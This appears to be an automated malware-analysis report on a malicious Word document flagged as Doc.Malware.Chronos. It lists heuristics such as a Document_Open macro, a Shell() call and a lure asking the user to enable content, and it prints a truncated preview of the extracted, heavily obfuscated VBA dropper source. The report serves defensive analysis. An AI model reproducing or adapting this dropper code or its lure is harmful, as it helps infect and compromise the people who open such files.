MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro, combined with a 'Shell()' call, indicates an attempt to execute arbitrary code. The document body explicitly prompts the user to 'CLICK ENABLE CONTENT TO VIEW CLEAR FILE', a common lure to bypass macro security. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further confirms its malicious nature, suggesting it's a known malware variant.
Heuristics 7
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22761 bytes |
SHA-256: 8453af185f92b7eab468573a778d017027dfd10685da99711916da7b1fad3048 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fsaRHYW(VPMumzvU As String) As String
While NFFOmk < 35
OavLstH = RTrim("w^ywLVd!cNY@xGNP*Ovg")
XvkYFwpK = LTrim("t^DyiA($XR@s^")
NFFOmk = NFFOmk + 1
Wend
OavLstH = "MwRfq-RD SF" + "Ssf.DkhWdQ UedE." + "fPAtk*XtbVO#ix"
For CFhyVc = 0 To 108
JrOhp = Space(19)
RSDnqZ = Space(5)
XvkYFwpK = "xRyPMDdT?nP" + ")empssG#vmM^%r_$BR" + "mw)!bp)yOzq"
eubodj = Right("gd#$C[lSTlR", 3)
eubodj = LTrim("v]Jd[RKPUbC^")
DyxwB = Right("Xpa-MD.ipWWHp", 3)
JrOhp = Space(15)
AuEcjY = 1247 - 1384 - 1211
Next CFhyVc
eubodj = Right("%ax$NVSR(krRVDY", 3)
AuEcjY = RTrim("y&MSFsDveMKHVFj?")
Dim wpWxqw() As Byte
While XIgrXd < 63
LcKqd = Right("Knt#M#iJ&B$Ou-d", 5)
RSDnqZ = 1667 + 1368 + 1607
XfTRcuIQ = 1400 - 1320 - 1194
OavLstH = 493 + 759 + 1653
pWToUIW = Space(15)
XIgrXd = XIgrXd + 1
Wend
For mpXHDT = 0 To 202
DyxwB = LTrim("ES?m[lcjDQ")
JrOhp = Left("I[bRLMzE&S.D_Ok", 5)
LcKqd = LTrim("d ]PmWPc.javz")
AuEcjY = Right("K#(.#y?QPZ", 2)
pWToUIW = StrReverse("ZdT.mwKspt*hsH)pqs")
OavLstH = LTrim("pjT]EXvtoB(MGi#dV-")
OavLstH = StrReverse("KvFkVmPsrBPMU^bnX")
JrOhp = Space(19)
pWToUIW = LTrim("ZjPIlEr!!fuPYVXY*UN)")
Next mpXHDT
AuEcjY = Right("u[^_CdyuEej)C?", 4)
Dim fWUoV(512) As Byte
eubodj = Space(14)
LcKqd = 1265 + 148 + 531
While WitqFm < 47
RSDnqZ = Left("-jRfQtKz%t[mnWMdLD", 4)
iGdXiA = LTrim("bQh[c.GLLj*Jgg?")
JrOhp = Left("Ehh]riW?Y&oXxhkHzA[E", 2)
DyxwB = Space(10)
pWToUIW = StrReverse("Rrmx!tWlw]fW")
WitqFm = WitqFm + 1
Wend
While uraawA < 349
ghqaVX = UCase("?v]BpRbf@wid*qrD&%?$")
pWToUIW = RTrim("$fMW.Vw^^feWD")
uraawA = uraawA + 2
Wend
DyxwB = 488 + 1667 + 545
Dim cGZGZN As Integer
OavLstH = Space(1)
LcKqd = UCase("?czYfv]-@v")
cGZGZN = 0
XfTRcuIQ = RTrim("c)%oEyk^D F%CUM")
iGdXiA = 554 + 1320 + 1301
wpWxqw = StrConv(VPMumzvU, vbFromUnicode)
OavLstH = Left("aEKD%lf[-*]", 4)
For rpGEA = 0 To UBound(wpWxqw) - 1
ghqaVX = Right("pH?.sgxLRMjfc&!*D", 3)
If (rpGEA Mod 2 = 0) Then
JrOhp = ")dLVQcizGm" + "MnmaiL@ysY?i(" + "RF(^bagSEmRzfH$]%R"
fWUoV(cGZGZN) = wpWxqw(rpGEA)
OavLstH = Left(")t*sIPbnyG^XXO.HRl", 2)
While vAAVbu < 90
OavLstH = "AqtFK]rarP]s&WZg^TAi" + "GTc(KbZXhke" + "lWUI?NLdUWw"
XfTRcuIQ = 1799 + 470 + 1463
iGdXiA = UCase("kG iYChMxigLSou")
ghqaVX = LTrim(" CiSF%@oTc-(Pp#t")
RSDnqZ = "KVoFP-HHsx]hYxfv" + "tR[p(T ujD*@-yo.m" + "(QBk iY?jLTGoGBB*df"
OavLstH = StrReverse(")jhd$E&N-TgSM")
JrOhp = Right("PUid^$kX[b)qM!", 2)
pWToUIW = RTrim("ByHZNS_jQIJf_XDtud")
vAAVbu = vAAVbu + 1
Wend
cGZGZN = cGZGZN + 1
While teAUzC < 345
LcKqd = "wXAq.cS]Px.M&zHf" + "LKSiwX n_La" + "Y fYIkxEQ(Q s"
pWToUIW = Right("#(c-fMV]SlP", 2)
ghqaVX = Right("?eI]Q$gd.lDn j(DH&t", 2)
ghqaVX = RTrim("!SSr(cY!S*pvWfDT")
LcKqd = 1894 + 1853 + 1459
pWToUIW = RTrim("wlAGryNfD._")
RSDnqZ = Right("FAdgjFQfd[u yTnQ", 2)
eubodj = Space(13)
RSDnqZ = RTrim("C#ka[Ye%[_t")
XvkYFwpK = UCase("]aLjiH_FmhxLnz")
teAUzC = teAUzC + 2
Wend
For uKtXdX = 0 To 381
iGdXiA = 511 - 1948 - 1047
ghqaVX = Right("^dx)#Iyf
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.